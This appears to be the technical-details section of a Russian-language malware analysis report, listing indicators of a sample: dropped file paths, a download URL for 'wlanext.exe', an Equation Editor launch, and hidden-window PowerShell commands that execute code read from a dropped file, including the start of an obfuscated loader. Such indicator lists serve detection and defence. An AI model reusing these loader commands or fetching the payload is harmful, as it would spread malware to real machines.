Техническая информация
- '' (загружен из сети Интернет)
- '%APPDATA%\wlanext.exe'
- %APPDATA%\wlanext.exe
- %TEMP%\nsl35c0.tmp
- %APPDATA%\forsakes\pterosauria\arhythmia\kaffeslaberasers\claudian\systole.dup
- %APPDATA%\forsakes\pterosauria\arhythmia\kaffeslaberasers\claudian\eructation.vrt
- %APPDATA%\forsakes\pterosauria\arhythmia\imbosoming\recanting\hysterogenous57\velartikuleretheden\foretagendens226.pse
- %APPDATA%\forsakes\pterosauria\arhythmia\hibbet62\biofag.san
- %APPDATA%\forsakes\pterosauria\arhythmia\bdeforlgs\impregns.hel
- %APPDATA%\forsakes\pterosauria\arhythmia\bdeforlgs\positionslisters.txt
- '19#.#2.81.254':80
- http://19#.#2.81.254/3458/wlanext.exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\kaffeslaberasers\Claudian\Eructation.Vrt' ; powershell.Exe "$fe32"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized $fe32 = Get-Content '%APPDATA%\Forsakes\pterosauria\arhythmia\kaffeslaberasers\Claudian\Eructation.Vrt' ; powershell.Exe "$fe32"' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "<#Ametabolism Postprocess Raceadskillelsernes Smilehuls Groups sunbaths Rhodope #>$Fuldfrelsers = """sd;TaF Gu HnKecHetPoiDaoAmnGy HaVHeAReR A5Ko3 D Pe{Su es Ta An RkpBoaYorFiaInmSa(Fa[ MSUnt ...